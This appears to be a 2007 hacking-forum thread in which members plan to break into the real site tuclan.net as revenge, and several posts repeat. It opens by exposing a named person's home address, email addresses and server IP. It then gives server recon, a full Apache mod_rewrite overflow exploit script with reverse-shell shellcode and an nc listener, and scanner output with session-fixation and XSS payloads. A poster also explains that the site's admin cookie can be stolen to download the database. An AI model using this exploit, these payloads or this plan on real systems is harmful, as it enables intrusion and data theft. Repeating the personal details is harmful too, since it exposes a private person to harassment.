here is what i know.
User Info_
Name: James Williamson
Address: 8705 Higdon Drive Vienna VA 22182
Email: [email protected]
Email: [email protected]
Website Info_
Website IP: 74.208.31.81
Name Server: NS29.1AND1.COM
Name Server: NS30.1AND1.COM
Ping Results:
Results
count ttl (hops) rtt (ms) from
1 53 12 74.208.31.81
2 53 12 74.208.31.81
3 53 12 74.208.31.81
4 53 12 74.208.31.81
5 53 12 74.208.31.81
Statistics
packets sent 5
received 5 100%
lost 0 0%
times (ms)
min 12
avg 12
max 12
-edit possible-
tuclan.net
- Sethioz
- Admin
- Posts: 4764
- Joined: Fri Jul 27, 2007 5:11 pm
- Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz - Location: unknown
- Contact:
Re: tuclan.net
oookey .. lets see.
you should have added that you wanna own it...anyways.
seems to be running in Unix.
server banner - apache 1.3.33 unix
webserver - apache 1.x (1.something)
forum - phpbb 2...
FTP IP 74.208.31.81 port 21
FTP - ftp.tuclan.net (dont know admin's username)
i gonna run several scans on it .. to see if it has any holes in it. (SQL, RFI, XSS ...etc)
so far i dont know what system it uses .. it seems to be phpnuke .. but im not 100% sure...it also maybe e107.
need to check some source code and data.
I will keep this topic up to date ...
...scanning....
update
what the hell ? ..it seems that its not a website system at all .. it seems to be simple html pages linked togheter :S .. thats lame. Forum is phpbb 2, but im not sure what version.
There is site tree in bottom of message
Update
Here is something that should work .. a shell ''mod rewrite off-by-one remote overflow''
you should have added that you wanna own it...anyways.
seems to be running in Unix.
server banner - apache 1.3.33 unix
webserver - apache 1.x (1.something)
forum - phpbb 2...
FTP IP 74.208.31.81 port 21
FTP - ftp.tuclan.net (dont know admin's username)
i gonna run several scans on it .. to see if it has any holes in it. (SQL, RFI, XSS ...etc)
so far i dont know what system it uses .. it seems to be phpnuke .. but im not 100% sure...it also maybe e107.
need to check some source code and data.
I will keep this topic up to date ...
...scanning....
update
what the hell ? ..it seems that its not a website system at all .. it seems to be simple html pages linked togheter :S .. thats lame. Forum is phpbb 2, but im not sure what version.
There is site tree in bottom of message
Update
Here is something that should work .. a shell ''mod rewrite off-by-one remote overflow''
Code: Select all
#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one(Win32).
#
# by axis <axis@ph4nt0m>
# http://www.ph4nt0m.org
# 2007-04-06
#
# Tested on Apache 2.0.58 (Win32)
# Windows2003 CN SP1
#
# Vulnerable Apache Versions:
# * 1.3 branch: >1.3.28 and <1.3.37
# * 2.0 branch: >2.0.46 and <2.0.59
# * 2.2 branch: >2.2.0 and <2.2.3
#
#
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# first POC by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
# http://www.milw0rm.com/exploits/2237
#
#
#
# to successfully exploit the vuln,there are some conditions
# http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html
#
#
# some compilers added padding to the stack, so they could not be exploited,like gcc under redhat
#
# for more details about the vuln please see:
# http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded
#
#
# no opcodes needed under windows!
# it will directly run our shellcode
#
# my apache config file
# [httpd.conf]:
# RewriteEngine on
# RewriteRule 1/(.*) $1
# RewriteLog "logs/rewrite.log"
# RewriteLogLevel 3
#
#
# Usage:
# [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141
# mod_rewrite apache off-by-one overflow
#
# [axis@opensystemX axis]$ nc -vv -n -l -p 1154
# listening on [any] 1154 ...
# connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077
# Microsoft Windows [��?��? 5.2.3790]
# (C) ��?����?����D 1985-2003 Microsoft Corp.
#
# D:\Apache\Apache2>exit
# exit
# sent 5, rcvd 100
#
#
#
# shellcode ��badchar���������õģ���ʵ����Ҫ��ô��
# �Ҹ����badchar�� 0x3f�� 0x0b ��������ǰ���shellcodeϰ���Ա����
# 0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b
#
echo -e "mod_rewrite apache off-by-one overflow"
if [ $# -ne 1 ] ; then
echo "Usage: $0 webserver"
exit
fi
host=$1
#use ldap:// to trigger the vuln, "Ph4nt0m" is any arbitrary string
echo -ne "GET /1/ldap://ph4nt0m/`perl -e 'print "Ph4nt0m"x5'`\
# %3f to trigger the vuln
%3fA%3fA%3f\
#string "CCCC.." is any arbitrary string, use %3f to trigger the vuln
#%90 is the machine code we will jmp to(NOP),run shellcode from here
`perl -e 'print "C"x10'`%3fC%3f%90\
# shellcode,reverse shell to 192.168.0.1 ,port 1154 alpha2 encoded
`perl -e 'print "\
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49\
\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63\
\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x42\x32\x42\x41\x41\x32\
\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x79\x79\x6c\x51\
\x7a\x6a\x4b\x50\x4d\x4d\x38\x6b\x49\x79\x6f\x49\x6f\x6b\x4f\x65\
\x30\x4c\x4b\x72\x4c\x45\x74\x51\x34\x4e\x6b\x71\x55\x77\x4c\x6c\
\x4b\x33\x4c\x64\x45\x33\x48\x64\x41\x5a\x4f\x4c\x4b\x72\x6f\x36\
\x78\x4c\x4b\x73\x6f\x45\x70\x66\x61\x4a\x4b\x53\x79\x4e\x6b\x44\
\x74\x4e\x6b\x73\x31\x38\x6e\x55\x61\x79\x50\x6c\x59\x6c\x6c\x4b\
\x34\x6f\x30\x74\x34\x34\x47\x59\x51\x5a\x6a\x76\x6d\x76\x61\x6f\
\x32\x5a\x4b\x79\x64\x55\x6b\x33\x64\x51\x34\x41\x38\x30\x75\x4b\
\x55\x6e\x6b\x33\x6f\x44\x64\x46\x61\x7a\x4b\x32\x46\x6e\x6b\x34\
\x4c\x42\x6b\x6e\x6b\x73\x6f\x77\x6c\x54\x41\x58\x6b\x43\x33\x74\
\x6c\x6c\x4b\x4d\x59\x50\x6c\x74\x64\x75\x4c\x52\x41\x6f\x33\x50\
\x31\x6b\x6b\x72\x44\x4c\x4b\x50\x43\x66\x50\x6c\x4b\x33\x70\x64\
\x4c\x6c\x4b\x74\x30\x65\x4c\x4e\x4d\x4e\x6b\x53\x70\x47\x78\x33\
\x6e\x51\x78\x4c\x4e\x52\x6e\x56\x6e\x58\x6c\x50\x50\x59\x6f\x79\
\x46\x70\x66\x62\x73\x75\x36\x75\x38\x66\x53\x64\x72\x42\x48\x53\
\x47\x32\x53\x50\x32\x71\x4f\x71\x44\x49\x6f\x48\x50\x52\x48\x5a\
\x6b\x48\x6d\x6b\x4c\x65\x6b\x70\x50\x4b\x4f\x68\x56\x61\x4f\x4e\
\x69\x4a\x45\x30\x66\x6e\x61\x78\x6d\x67\x78\x73\x32\x42\x75\x52\
\x4a\x75\x52\x6b\x4f\x7a\x70\x61\x78\x6b\x69\x55\x59\x6c\x35\x6e\
\x4d\x51\x47\x4b\x4f\x4e\x36\x70\x53\x50\x53\x56\x33\x76\x33\x43\
\x73\x32\x73\x31\x53\x52\x73\x6b\x4f\x4a\x70\x70\x68\x6f\x30\x6d\
\x78\x35\x50\x46\x61\x30\x66\x30\x68\x76\x64\x6c\x42\x33\x56\x70\
\x53\x4e\x69\x78\x61\x4c\x55\x75\x38\x4a\x4c\x58\x79\x4c\x6a\x73\
\x50\x53\x67\x6b\x4f\x6a\x76\x73\x5a\x72\x30\x73\x61\x53\x65\x4b\
\x4f\x6a\x70\x52\x46\x31\x7a\x52\x44\x73\x56\x50\x68\x51\x73\x50\
\x6d\x32\x4a\x62\x70\x51\x49\x47\x59\x6a\x6c\x6c\x49\x4b\x57\x42\
\x4a\x73\x74\x6d\x59\x6d\x32\x35\x61\x6f\x30\x48\x73\x4f\x5a\x6f\
\x65\x4c\x49\x39\x6d\x4b\x4e\x33\x72\x54\x6d\x6b\x4e\x33\x72\x34\
\x6c\x6c\x4d\x50\x7a\x57\x48\x4e\x4b\x4c\x6b\x6c\x6b\x71\x78\x32\
\x52\x6b\x4e\x6c\x73\x42\x36\x49\x6f\x73\x45\x65\x78\x6b\x4f\x6e\
\x36\x71\x4b\x42\x77\x43\x62\x53\x61\x76\x31\x70\x51\x30\x6a\x35\
\x51\x62\x71\x76\x31\x72\x75\x43\x61\x4b\x4f\x6e\x30\x73\x58\x4e\
\x4d\x7a\x79\x37\x75\x38\x4e\x31\x43\x4b\x4f\x4a\x76\x30\x6a\x39\
\x6f\x6b\x4f\x70\x37\x6b\x4f\x6e\x30\x45\x38\x39\x77\x54\x39\x79\
\x56\x71\x69\x79\x6f\x53\x45\x56\x64\x69\x6f\x69\x46\x6b\x4f\x62\
\x57\x6b\x4c\x4b\x4f\x6a\x70\x50\x68\x6a\x50\x6f\x7a\x37\x74\x43\
\x6f\x72\x73\x4b\x4f\x6a\x76\x79\x6f\x38\x50\x63\
"'`\
HTTP/1.0\r\n\
Host: $host\r\n\r\n" | nc -vv $host 80
# milw0rm.com [2007-04-07]
- Attachments
-
- tuclantree.JPG (25.86 KiB) Viewed 7690 times
- Sethioz
- Admin
- Posts: 4764
- Joined: Fri Jul 27, 2007 5:11 pm
- Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz - Location: unknown
- Contact:
Re: tuclan.net
PHPSESSID session fixation
This script is vulnerable to PHPSESSID session fixation attacks.
By injecting a custom PHPSESSID is possible to alter the PHP session cookie. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site.
This vulnerability affects /aff.
Request
GET /aff/?PHPSESSID=acunetixsessionfixation HTTP/1.0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Host: tuclan.net
Connection: Close
Pragma: no-cacheResponse
HTTP/1.1 200 OK
Date: Wed, 12 Dec 2007 21:09:38 GMT
Server: Apache/1.3.33 (Unix)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
------------------------------------------------------------------------------------------------------------------
Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
This alert has been generated using only banner information. It may be a false positive.
Apache mod_rewrite is prone to an off-by-one buffer-overflow condition. The vulnerability arising in the mod_rewrite module's ldap scheme handling allows for potential memory corruption when an attacker exploits certain rewrite rules.
Affected Apache versions:
Apache 1.3.28 - 1.3.36 with mod_rewrite
Apache 2.2.0 - 2.2.2 with mod_rewrite
Apache 2.0.46 - 2.0.58 with mod_rewrite
Attack details
Current version is Apache/1.3.33
------------------------------------------------------------------------------------------------------------------
Apache version older than 1.3.34
Vulnerability description
This alert has been generated using only banner information. It may be a false positive.
Two potential security issues have been fixed in Apache version 1.3.34:
If a request contains both Transfer-Encoding and Content-Length headers, remove the Content-Length, mitigating some HTTP Request Splitting/Spoofing attacks.
Added TraceEnable [on|off|extended] per-server directive to alter the behavior of the TRACE method.
Affected Apache versions (up to 1.3.33).
This vulnerability affects Web Server.
------------------------------------------------------------------------------------------------------------------
Unfiltered Header Injection in Apache 1.3.34/2.0.57/2.2.1
Vulnerability description
This version of Apache is vulnerable to HTML injection (including malicious Javascript code) through "Expect" header. Until not it was not classed as security vulnerability as an attacker has no way to influence the Expect header a victim will send to a target site. However, according to Amit Klein's paper: "Forging HTTP request headers with Flash" there is a working cross site scripting (XSS) attack against Apache 1.3.34, 2.0.57 and 2.2.1 (as long as the client browser is IE or Firefox, and it supports Flash 6/7+).
Affected Apache versions (up to 1.3.34/2.0.57/2.2.1).
Request
GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Host: tuclan.net
Cookie: PHPSESSID=4c1a966d8d5e01bb4d5142ba31d7bb99;tuclan_forum_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D;tuclan_forum_sid=fdd0deb96a2ea5e76b55c2309c255db4
Connection: Close
Expect: <script>alert(892727953)</script>
Pragma: no-cacheResponse
HTTP/1.1 417 Expectation Failed
Date: Wed, 12 Dec 2007 08:09:08 GMT
Server: Apache/1.3.33 (Unix)
Connection: close
Content-Type: text/html; charset=iso-8859-1
this first one ... this /aff one. it means you can steal cookie and then login as admin..into admin panel. so you can download db.
i also gonna run other scan on it later ...
This script is vulnerable to PHPSESSID session fixation attacks.
By injecting a custom PHPSESSID is possible to alter the PHP session cookie. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site.
This vulnerability affects /aff.
Request
GET /aff/?PHPSESSID=acunetixsessionfixation HTTP/1.0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Host: tuclan.net
Connection: Close
Pragma: no-cacheResponse
HTTP/1.1 200 OK
Date: Wed, 12 Dec 2007 21:09:38 GMT
Server: Apache/1.3.33 (Unix)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
------------------------------------------------------------------------------------------------------------------
Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
This alert has been generated using only banner information. It may be a false positive.
Apache mod_rewrite is prone to an off-by-one buffer-overflow condition. The vulnerability arising in the mod_rewrite module's ldap scheme handling allows for potential memory corruption when an attacker exploits certain rewrite rules.
Affected Apache versions:
Apache 1.3.28 - 1.3.36 with mod_rewrite
Apache 2.2.0 - 2.2.2 with mod_rewrite
Apache 2.0.46 - 2.0.58 with mod_rewrite
Attack details
Current version is Apache/1.3.33
------------------------------------------------------------------------------------------------------------------
Apache version older than 1.3.34
Vulnerability description
This alert has been generated using only banner information. It may be a false positive.
Two potential security issues have been fixed in Apache version 1.3.34:
If a request contains both Transfer-Encoding and Content-Length headers, remove the Content-Length, mitigating some HTTP Request Splitting/Spoofing attacks.
Added TraceEnable [on|off|extended] per-server directive to alter the behavior of the TRACE method.
Affected Apache versions (up to 1.3.33).
This vulnerability affects Web Server.
------------------------------------------------------------------------------------------------------------------
Unfiltered Header Injection in Apache 1.3.34/2.0.57/2.2.1
Vulnerability description
This version of Apache is vulnerable to HTML injection (including malicious Javascript code) through "Expect" header. Until not it was not classed as security vulnerability as an attacker has no way to influence the Expect header a victim will send to a target site. However, according to Amit Klein's paper: "Forging HTTP request headers with Flash" there is a working cross site scripting (XSS) attack against Apache 1.3.34, 2.0.57 and 2.2.1 (as long as the client browser is IE or Firefox, and it supports Flash 6/7+).
Affected Apache versions (up to 1.3.34/2.0.57/2.2.1).
Request
GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Host: tuclan.net
Cookie: PHPSESSID=4c1a966d8d5e01bb4d5142ba31d7bb99;tuclan_forum_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D;tuclan_forum_sid=fdd0deb96a2ea5e76b55c2309c255db4
Connection: Close
Expect: <script>alert(892727953)</script>
Pragma: no-cacheResponse
HTTP/1.1 417 Expectation Failed
Date: Wed, 12 Dec 2007 08:09:08 GMT
Server: Apache/1.3.33 (Unix)
Connection: close
Content-Type: text/html; charset=iso-8859-1
this first one ... this /aff one. it means you can steal cookie and then login as admin..into admin panel. so you can download db.
i also gonna run other scan on it later ...
Re: tuclan.net
so we are good to go to own them. these guys continue to talk. and talk, i have given multiple warnings to stop and they didnt. we have to take action sethioz. Check out my website for the details. i have screenshots. You can make an account there. If you do, they'll ask what their favorite game to play is. just exit the register and go back into it, the question will change
Now i need to know how to do this xploit. get on MSN asap
Now i need to know how to do this xploit. get on MSN asap
Re: tuclan.net
i think i got it. The mod_rewrite vuln is a BoF, obviously and from what i know its xploited from the server. So we have to connect to the server don't we. This is the only thing i don't understand. its a buffer overflow attack, and its meant to be xploited on apache 1.3.28 - 1.3.36. So we need to connect to the host using PuTTY, or another type of tool, then go to that directory and xploit it according to the vulnerability as seen above.
- Sethioz
- Admin
- Posts: 4764
- Joined: Fri Jul 27, 2007 5:11 pm
- Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz - Location: unknown
- Contact:
Re: tuclan.net
no not really lol .. its a shell.
.sh = shell
it has nothing to do with connecting ... its a ready-to-use EXPLOIT.
im not 100% sure what will open/use it .. but it should be something similiar to RFI or perl exploits. ..so you simply run it and/or use it.
...i dont get it .. WTF is a sh. well i know it stands for ''shell'' ..but wht is the program that runs it.
just like in perl .. you do ''perl script.pl -parameters'' .. if you took a look at this ''sh mod_rewrite.sh 10.0.76.141''
oviously last one is ip. ..so its sh should be sh.exe .. just like in perl and php ..you type php/perl which will run perl.exe/php.exe .. so there should be some program that uses .sh extensions. really dont have mood to look into it ..
.sh = shell
it has nothing to do with connecting ... its a ready-to-use EXPLOIT.
im not 100% sure what will open/use it .. but it should be something similiar to RFI or perl exploits. ..so you simply run it and/or use it.
Code: Select all
Usage:
# [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141
# mod_rewrite apache off-by-one overflow
#
# [axis@opensystemX axis]$ nc -vv -n -l -p 1154
# listening on [any] 1154 ...
# connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077
# Microsoft Windows [��?��? 5.2.3790]
# (C) ��?����?����D 1985-2003 Microsoft Corp.
just like in perl .. you do ''perl script.pl -parameters'' .. if you took a look at this ''sh mod_rewrite.sh 10.0.76.141''
oviously last one is ip. ..so its sh should be sh.exe .. just like in perl and php ..you type php/perl which will run perl.exe/php.exe .. so there should be some program that uses .sh extensions. really dont have mood to look into it ..
- Sethioz
- Admin
- Posts: 4764
- Joined: Fri Jul 27, 2007 5:11 pm
- Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz - Location: unknown
- Contact:
Re: tuclan.net
ok i was wrong ... sh stands for ''bash'' its something similiar to linux terminal.
..thts not the problem, problem is that .. this piece of junk exploit doesnt work ! .. it has errors in it. ..or maybe you need to compile it .. but i seriously doubt. im not that stupid ..its a ready to use ''bash'' exploits which doesnt work !
who is intrested...you can do some research WHY this exploits doesnt work .. or maybe there is another way to run it...but i seriously doubt.
oh yeah and .. ''cygwin'' is what you need. unix tools for win .. or something like that
..thts not the problem, problem is that .. this piece of junk exploit doesnt work ! .. it has errors in it. ..or maybe you need to compile it .. but i seriously doubt. im not that stupid ..its a ready to use ''bash'' exploits which doesnt work !
who is intrested...you can do some research WHY this exploits doesnt work .. or maybe there is another way to run it...but i seriously doubt.
oh yeah and .. ''cygwin'' is what you need. unix tools for win .. or something like that
- Attachments
-
- bash1.JPG (19.61 KiB) Viewed 7654 times
- Sethioz
- Admin
- Posts: 4764
- Joined: Fri Jul 27, 2007 5:11 pm
- Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz - Location: unknown
- Contact:
Re: tuclan.net
where did you go ?? i tought you wanted to hack it ... so depressed lately that i cant just go on with it ...ive found few exploits ... but now i tripped over next problem .. i got owned by linux ...it wont install .. just some fucking crap argh linux
...need to use gcc, to compile few things ...so i can test few other things .. but damn linux wont install.
...need to use gcc, to compile few things ...so i can test few other things .. but damn linux wont install.